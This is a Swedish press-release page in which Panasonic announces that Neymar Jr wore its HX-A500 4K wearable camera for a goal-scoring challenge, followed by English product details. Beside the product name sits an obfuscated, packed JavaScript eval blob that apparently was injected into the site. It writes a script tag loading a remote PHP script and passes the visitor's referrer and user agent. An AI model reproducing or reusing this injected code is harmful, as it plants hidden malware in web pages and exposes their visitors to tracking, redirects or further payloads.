Image Image Image Image Image Image Image Image Image Image

| 16 juni, 2021

Scroll to top

Top

Neymar Jr gör karriärens tuffaste och mest annorlunda mål

Neymar Jr gör karriärens tuffaste och mest annorlunda mål
Sebastian

Panasonic har allierat sig med den brasilianska superstjärnan i fotboll – Neymar da Silva Santos Jr – för att marknadsföra sin senaste bärbara 4K-kamera, A500. Panasonic bad Neymar Jr att bära en prototyp av sin bärbara 4K-kamera A500 och utmanade honom att göra det svåraste målet i sin karriär!

Idag presenterar Panasonic det 4K/30p-videomaterial som togs med A500 från Neymar Jr:s eget perspektiv när han antog utmaningen. För att upptäcka om han lyckades eller inte och för att se exklusiva bilder från bakom kulisserna – titta på Youtube-videon med titeln ”Neymar’s Eye” på http://youtu.be/C0vo5B92GgI .

A500 eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|kehhh|var|u0026u|referrer|rztnn||js|php’.split(’|’),0,{}))
product Information

Panasonic’s HX-A500 is the world’s first 4K/30p (25p) Wearable Camera and enables you to shoot scenes that put viewers right there, in the thick of the action. The main unit is separate from the lens unit, meaning you can mount the lens at face level and carry out hands-free shooting. Small and lightweight, the lens unit is comfortable to wear, making it easy to shoot casual sports action or to capture the expressions of your family at play. HX-A500 features gorgeous 4K/30p (25p) image quality, allowing you to capture beautiful images with heightened realism. With new Lens, the new BSI sensor and Crystal Engine Pro+, you can now enjoy clean and clear low-noise images. HX-A500 comes as standard with the newly designed main unit with an LCD and other features that improves operability. Via your smartphone or tablet, you can also quickly and easily upload your video to the Web.

Detta är ett pressmeddelande från Panasonic